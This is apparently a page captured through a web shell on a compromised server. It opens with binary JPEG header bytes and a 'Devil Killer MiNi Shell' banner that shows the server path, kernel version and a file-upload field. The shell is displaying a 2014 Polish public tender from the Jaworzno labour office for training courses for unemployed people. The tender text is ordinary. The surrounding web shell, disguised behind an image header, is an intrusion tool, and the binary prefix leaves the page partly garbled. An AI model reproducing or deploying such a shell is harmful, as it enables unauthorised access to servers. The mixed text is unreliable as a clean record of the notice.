JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/61203-N-2014.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach Projektu Twarzą w twarz z rynkiem pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu operacyjnego Kapitał Ludzki -  Poddziałanie 6.1.1</b><br>
<b>Numer ogłoszenia: 61203 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-jaworzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach Projektu Twarzą w twarz z rynkiem pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu operacyjnego Kapitał Ludzki -  Poddziałanie 6.1.1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach Projektu Twarzą w twarz z rynkiem pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu operacyjnego Kapitał Ludzki -  Poddziałanie 6.1.1 w następujących zakresach:
Zakres I:   Pracownik administracyjno - biurowy z elementami kadr i płac - 5 osób w I edycji,
Zakres II: Kurs spawania blach i rur spoinami pachwinowymi w metodzie MAG i TIG - 5 osób w I edycji,
Zakres III:  Kwalifikacyjny kurs pracownika  ochrony fizycznej - 5 osób w I edycji,
Zakres IV: Płytkarz - glazurnik - 5 osób w I edycji,
zakres V: Uprawnienia SEP do 1 kV - 5 osób w I edycji,
Zakres VI: Obsługa urządzeń sprzątających - 5 osób w I edycji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /Dz. U. Nr 236 poz. 2365/.
1.1.2	Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia,
o którym mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia:
1) zakres I - co najmniej dwie usługi szkoleniowe z zakresu pracownik administracyjno -biurowy                   z elementami  kadr i płac na minimum 5 osób. Zamawiający uzna również warunek za spełniony                  w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: pracownik administracyjny, pracownik biurowy oraz szkolenia z zakresu kadr i płac. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
2)  zakres II - co najmniej dwie usługi szkoleniowe z zakresu spawanie blach i rur spoinami pachwinowymi w metodzie MAG i TIG na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: spawanie blach i rur spoinami pachwinowymi w metodzie MAG oraz spawanie blach i rur spoinami pachwinowymi                        w metodzie TIG.  Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych                    w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu spawanie blach                i rur spoinami pachwinowymi w metodzie MAG i TIG. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
3) zakres III - co najmniej dwie usługi szkoleniowe z zakresu pracownik ochrony fizycznej na minimum              5 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
4) zakres IV - co najmniej dwie usługi szkoleniowe z zakresu płytkarz-glazurnik na minimum  5 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: płytkarz, glazurnik. Zamawiający uzna również warunek za spełniony                            w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
5) zakres V - co najmniej dwie usługi szkoleniowe z zakresu uprawnienia SEP do 1 kV na minimum               5 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
6) zakres VI- co najmniej dwie usługi szkoleniowe z zakresu obsługa urządzeń sprzątających na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń                       o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia                         nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
1.2.2.	Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów
i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku  udziału w postępowaniu, o którym mowa w tym pkt należy złożyć oświadczenie zgodnie z załącznikiem nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1) wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane   z tematyką prowadzonej jednostki modułowej lub wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe związane z tematyką prowadzonej jednostki modułowej.
W przypadku zakresu IV Zamawiający dopuszcza możliwość prowadzenia zajęć teoretycznych przez wykładowców posiadających wykształcenie minimum średnie związane z tematyką prowadzonej jednostki modułowej lub wykształcenie średnie oraz minimum 3 letnie doświadczenie zawodowe związane z tematyką prowadzonej jednostki modułowej. 
W przypadku zakresu VI Zamawiający dopuszcza możliwość prowadzenia zajęć teoretycznych przez wykładowców posiadających wykształcenie minimum średnie oraz minimum 3 letnie doświadczenie zawodowe związane z tematyką prowadzonej jednostki modułowej.
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej wykształcenie średnie związane z tematyką prowadzonej jednostki modułowej lub wykształcenie średnie oraz minimum 3 letnie doświadczenie zawodowe związane z tematyką prowadzonej jednostki modułowej;
W przypadku zakresu VI Zamawiający dopuszcza możliwość prowadzenia zajęć praktycznych przez wykładowców posiadających wykształcenie minimum średnie oraz minimum 3 letnie doświadczenie zawodowe  związane z tematyką prowadzonej jednostki modułowej;                              
3)  każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie zawodowe  w prowadzeniu zajęć zgodnych z tematyką prowadzonej jednostki modułowej;
4)  każda z osób prowadzących zajęcia musi posiadać uprawnienia pedagogiczne lub co najmniej 
2 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych.		
1.3.2	Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów
i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku  udziału w postępowaniu, o którym mowa w tym pkt należy złożyć oświadczenie zgodnie z załącznikiem nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - posiadanie certyfikatu jakości usług - 0.1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przemiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie uzasadnionych przypadkach,                    np. niezakwalifikowanie się odpowiedniej liczby uczestników szkolenia - może także nastąpić                      z inicjatywy Zamawiajacego. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany terminu realizacji przedmiotu zamówienia.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia.
W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.


4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie kolejnego naboru, brak osób spełniajacych warunki skierowania na szkolenie, Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2014 godzina 08:00, miejsce: I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Projektu Twarzą w twarz z rynkiem pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki -  Poddziałanie 6.1.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres I: Pracownik administracyjno - biurowy z elementami kadr i płac - 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji.
Czas realizacji: nie dłużej niż 6  tygodni. 
Program szkolenia: minimalna ilość godzin- 200, w tym minimum  140 godzin ćwiczeń. Program szkolenia musi zawierać następujące jednostki modułowe: 
1. zgodnie ze standardami kwalifikacji zawodowych dla zawodu: pracownik administracyjny                                          	(kod zawodu: 343101) i pracownik biurowy (kod zawodu:419101): 
1) organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy, ochrony                      	przeciwpożarowej i ochrony środowiska oraz zarządzanie w jednostce organizacyjnej,
2) organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz                               	doskonalenie osobistych kompetencji,
3) organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac                              	związanych z funkcjonowaniem przedsiębiorstwa,
4)   przyjmowanie i obsługiwanie interesantów,
5)   wykonywanie prac administracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6)   zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7)  sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej z działalnością                	jednostki organizacyjnej zgodnie z przyjętym systemem kancelaryjnym,
8)   przygotowanie i udostępnianie dokumentacji do kontroli,
9)   redagowanie korespondencji biurowej w języku polskim,
10) sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz finansowej                     	związanej z działalnością jednostki gospodarczej,
11) przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,
12) gromadzenie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika                              	administracyjnego,
13) tworzenie i prowadzenie bazy danych kontrahentów,
14) stosowanie przepisów prawa w pracy zawodowej,
15) wykonywanie prac biurowych,
16) współpraca z innymi komórkami organizacyjnymi jednostki,
17) współpraca z otoczeniem zewnętrznym jednostki organizacyjnej,
18) kierowanie zespołem pracowników administracyjno - biurowych,
19) ocenianie jakości i efektywności własnych działań zawodowych,
20) obsługa komputera (edytor tekstów, arkusz kalkulacyjny, bazy danych, program do prezentacji                                    	multimedialnych, poczta elektroniczna, Internet),
21) obsługa urządzeń biurowych
2. zgodnie z modułowym programem szkolenia zawodowego dla zawodu: księgowy, z zakresu: księgowy ds. płac 	i rozliczeń z ZUS (kod zawodu: 343201) z następującymi jednostkami modułowym:  
1) wynagrodzenie za pracę - minimum 6 godzin, zawierająca następujące jednostki szkoleniowe:
- płaca - jej funkcje i zasady 
- elementy i składniki wynagrodzenia za pracę 
-  minimalne wynagrodzenie za pracę
-   systemy wynagrodzenia za pracę 
-   wzorcowa lista płac 
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 6 godzin, zawierająca                             	następujące jednostki szkoleniowe:
- prawo do wynagrodzenia 
- ochrona wynagrodzenia za pracę 
- wgląd do dokumentacji płacowej 
- potrącenia z wynagrodzenia za pracę 
- rozliczenia publicznoprawne 
- odpowiedzialność pracodawcy przy wypłacie wynagrodzeń 
